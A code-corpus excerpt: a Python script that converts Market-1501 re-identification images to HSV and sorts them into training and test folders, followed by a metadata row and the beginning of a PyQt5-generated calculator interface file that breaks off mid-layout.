# #train_all
# train_path = download_path + '/bounding_box_train'
# train_save_path = download_path + '/pytorch/train_all'
# if not os.path.isdir(train_save_path):
# os.mkdir(train_save_path)
#
# for root, dirs, files in os.walk(train_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = train_path + '/' + name
# dst_path = train_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#
#
# #---------------------------------------
# #train_val
# train_path = download_path + '/bounding_box_train'
# train_save_path = download_path + '/pytorch/train'
# val_save_path = download_path + '/pytorch/val'
# if not os.path.isdir(train_save_path):
# os.mkdir(train_save_path)
# os.mkdir(val_save_path)
#
# for root, dirs, files in os.walk(train_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = train_path + '/' + name
# dst_path = train_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# dst_path = val_save_path + '/' + ID[0] #first image is used as val image
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#****************RGB TO HSV****************************
import os
from shutil import copyfile
import cv2
# You only need to change this line to your dataset download path
download_path = '/home/mcii216/fmx/dataset_ReID/Market-1501'
if not os.path.isdir(download_path):
print('please change the download_path')
save_path = download_path + '/pytorchsv'
if not os.path.isdir(save_path):
os.mkdir(save_path)
#-----------------------------------------
# query
query_path = download_path + '/query'
query_save_path = download_path + '/pytorchsv/query'
if not os.path.isdir(query_save_path):
os.mkdir(query_save_path)
for root, dirs, files in os.walk(query_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = query_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
sv_path = query_save_path + '/' + ID[0] + '/' + name
dst_path = query_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
cv2.imwrite(sv_path, img_hsv)
#-----------------------------------------
#multi-query
query_path = download_path + '/gt_bbox'
# for dukemtmc-reid, we do not need multi-query
if os.path.isdir(query_path):
query_save_path = download_path + '/pytorchsv/multi-query'
if not os.path.isdir(query_save_path):
os.mkdir(query_save_path)
for root, dirs, files in os.walk(query_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = query_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
sv_path = query_save_path + '/' + ID[0] + '/' + name
dst_path = query_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
cv2.imwrite(sv_path, img_hsv)
#-----------------------------------------
#gallery
gallery_path = download_path + '/bounding_box_test'
gallery_save_path = download_path + '/pytorchsv/gallery'
if not os.path.isdir(gallery_save_path):
os.mkdir(gallery_save_path)
for root, dirs, files in os.walk(gallery_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = gallery_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
sv_path = gallery_save_path + '/' + ID[0] + '/' + name
dst_path = gallery_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
cv2.imwrite(sv_path, img_hsv)
#---------------------------------------
#train_all
train_path = download_path + '/bounding_box_train'
train_save_path = download_path + '/pytorchsv/train_all'
if not os.path.isdir(train_save_path):
os.mkdir(train_save_path)
for root, dirs, files in os.walk(train_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = train_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
sv_path = train_save_path + '/' + ID[0] + '/' + name
dst_path = train_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
cv2.imwrite(sv_path, img_hsv)
#---------------------------------------
#train_val
train_path = download_path + '/bounding_box_train'
train_save_path = download_path + '/pytorchsv/train'
val_save_path = download_path + '/pytorchsv/val'
if not os.path.isdir(train_save_path):
os.mkdir(train_save_path)
os.mkdir(val_save_path)
for root, dirs, files in os.walk(train_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = train_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# sv_path = train_save_path + '/' + ID[0] + '/' + name
dst_path = train_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
dst_path = val_save_path + '/' + ID[0]
os.mkdir(dst_path)
cv2.imwrite(dst_path + '/' + name, img_hsv)
cv2.imwrite(dst_path + '/' + name, img_hsv)
| 34.847107 | 87 | 0.569667 | 1,122 | 8,433 | 4.025847 | 0.069519 | 0.100952 | 0.092097 | 0.058446 | 0.980739 | 0.970113 | 0.934027 | 0.919637 | 0.919637 | 0.919637 | 0 | 0.009561 | 0.243448 | 8,433 | 241 | 88 | 34.991701 | 0.698433 | 0.490454 | 0 | 0.717172 | 0 | 0 | 0.07215 | 0.015392 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030303 | 0 | 0.030303 | 0.010101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6cb995d209b91ed26bb29c4df78d7a3613962375 | 65,027 | py | Python | subPrograms/Hesap_Makinesi/Ui_calculator.py | birhann/Student-Tracking-System_Ogrenci-Takip-Sistemi | 0e01add14fa207861fbb573df6977c6701632cf5 | [
"Unlicense"
] | 2 | 2021-01-09T12:53:54.000Z | 2021-08-12T18:37:17.000Z | subPrograms/Hesap_Makinesi/Ui_calculator.py | birhann/Student-Tracking-System_Ogrenci-Takip-Sistemi | 0e01add14fa207861fbb573df6977c6701632cf5 | [
"Unlicense"
] | null | null | null | subPrograms/Hesap_Makinesi/Ui_calculator.py | birhann/Student-Tracking-System_Ogrenci-Takip-Sistemi | 0e01add14fa207861fbb573df6977c6701632cf5 | [
"Unlicense"
] | 3 | 2021-01-26T06:02:02.000Z | 2021-06-20T15:52:05.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'c:\Users\Lenovo\Desktop\Python\Programlar\Hesap_Makinesi\calculator.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(429, 362)
Form.setMinimumSize(QtCore.QSize(429, 362))
Form.setMaximumSize(QtCore.QSize(429, 500))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 62, 211))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(189, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(88, 160, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(121, 128, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 244, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(215, 202, 98))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(91, 79, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(176, 255, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 62, 211))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(189, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(88, 160, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(121, 128, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 244, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(215, 202, 98))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(91, 79, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(176, 255, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 62, 211))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(189, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(88, 160, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(121, 128, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 120, 215))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(91, 79, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(132, 240, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(176, 255, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
Form.setPalette(palette)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("Calculator_icon.svg.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Form.setWindowIcon(icon)
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setObjectName("verticalLayout")
self.operation_history = QtWidgets.QLabel(Form)
self.operation_history.setMinimumSize(QtCore.QSize(0, 25))
self.operation_history.setMaximumSize(QtCore.QSize(16777215, 10))
font = QtGui.QFont()
font.setFamily("MingLiU-ExtB")
font.setPointSize(12)
self.operation_history.setFont(font)
self.operation_history.setText("")
self.operation_history.setObjectName("operation_history")
self.verticalLayout.addWidget(self.operation_history)
self.writing_area = QtWidgets.QTextEdit(Form)
self.writing_area.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(50)
sizePolicy.setHeightForWidth(self.writing_area.sizePolicy().hasHeightForWidth())
self.writing_area.setSizePolicy(sizePolicy)
self.writing_area.setMinimumSize(QtCore.QSize(0, 0))
self.writing_area.setMaximumSize(QtCore.QSize(16777215, 85))
self.writing_area.setSizeIncrement(QtCore.QSize(0, 0))
self.writing_area.setBaseSize(QtCore.QSize(0, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(55, 57, 55))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(55, 57, 55))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 120, 215))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.writing_area.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(37)
font.setKerning(True)
self.writing_area.setFont(font)
self.writing_area.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.OpenHandCursor))
self.writing_area.setMouseTracking(True)
self.writing_area.setFocusPolicy(QtCore.Qt.NoFocus)
self.writing_area.setAccessibleName("")
self.writing_area.setStyleSheet("")
self.writing_area.setObjectName("writing_area")
self.verticalLayout.addWidget(self.writing_area)
self.verticalLayout_5 = QtWidgets.QVBoxLayout()
self.verticalLayout_5.setSpacing(7)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.horizontalLayout.setContentsMargins(-1, -1, -1, 0)
self.horizontalLayout.setSpacing(5)
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_2.setSpacing(0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.clear_line = QtWidgets.QPushButton(Form)
self.clear_line.setMinimumSize(QtCore.QSize(0, 0))
self.clear_line.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.clear_line.setFont(font)
self.clear_line.setIconSize(QtCore.QSize(20, 20))
self.clear_line.setShortcut("")
self.clear_line.setCheckable(False)
self.clear_line.setObjectName("clear_line")
self.verticalLayout_2.addWidget(self.clear_line)
self.seven = QtWidgets.QPushButton(Form)
self.seven.setMinimumSize(QtCore.QSize(0, 0))
self.seven.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.seven.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.seven.setFont(font)
self.seven.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.seven.setIconSize(QtCore.QSize(20, 20))
self.seven.setShortcut("")
self.seven.setCheckable(False)
self.seven.setObjectName("seven")
self.verticalLayout_2.addWidget(self.seven)
self.four = QtWidgets.QPushButton(Form)
self.four.setMinimumSize(QtCore.QSize(0, 0))
self.four.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.four.setFont(font)
self.four.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.four.setIconSize(QtCore.QSize(20, 20))
self.four.setShortcut("")
self.four.setCheckable(False)
self.four.setObjectName("four")
self.verticalLayout_2.addWidget(self.four)
self.one = QtWidgets.QPushButton(Form)
self.one.setMinimumSize(QtCore.QSize(0, 0))
self.one.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.one.setFont(font)
self.one.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.one.setIconSize(QtCore.QSize(20, 20))
self.one.setShortcut("")
self.one.setCheckable(False)
self.one.setObjectName("one")
self.verticalLayout_2.addWidget(self.one)
self.arti_eksi = QtWidgets.QPushButton(Form)
self.arti_eksi.setMinimumSize(QtCore.QSize(0, 0))
self.arti_eksi.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.arti_eksi.setFont(font)
self.arti_eksi.setIconSize(QtCore.QSize(20, 20))
self.arti_eksi.setShortcut("")
self.arti_eksi.setCheckable(False)
self.arti_eksi.setObjectName("arti_eksi")
self.verticalLayout_2.addWidget(self.arti_eksi)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_3.setSpacing(0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.clear_all = QtWidgets.QPushButton(Form)
self.clear_all.setMinimumSize(QtCore.QSize(0, 0))
self.clear_all.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(101, 196, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(148, 245, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(101, 196, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(148, 245, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(101, 196, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(221, 243, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
self.clear_all.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.clear_all.setFont(font)
self.clear_all.setIconSize(QtCore.QSize(20, 20))
self.clear_all.setShortcut("")
self.clear_all.setCheckable(False)
self.clear_all.setDefault(False)
self.clear_all.setObjectName("clear_all")
self.verticalLayout_3.addWidget(self.clear_all)
self.eight = QtWidgets.QPushButton(Form)
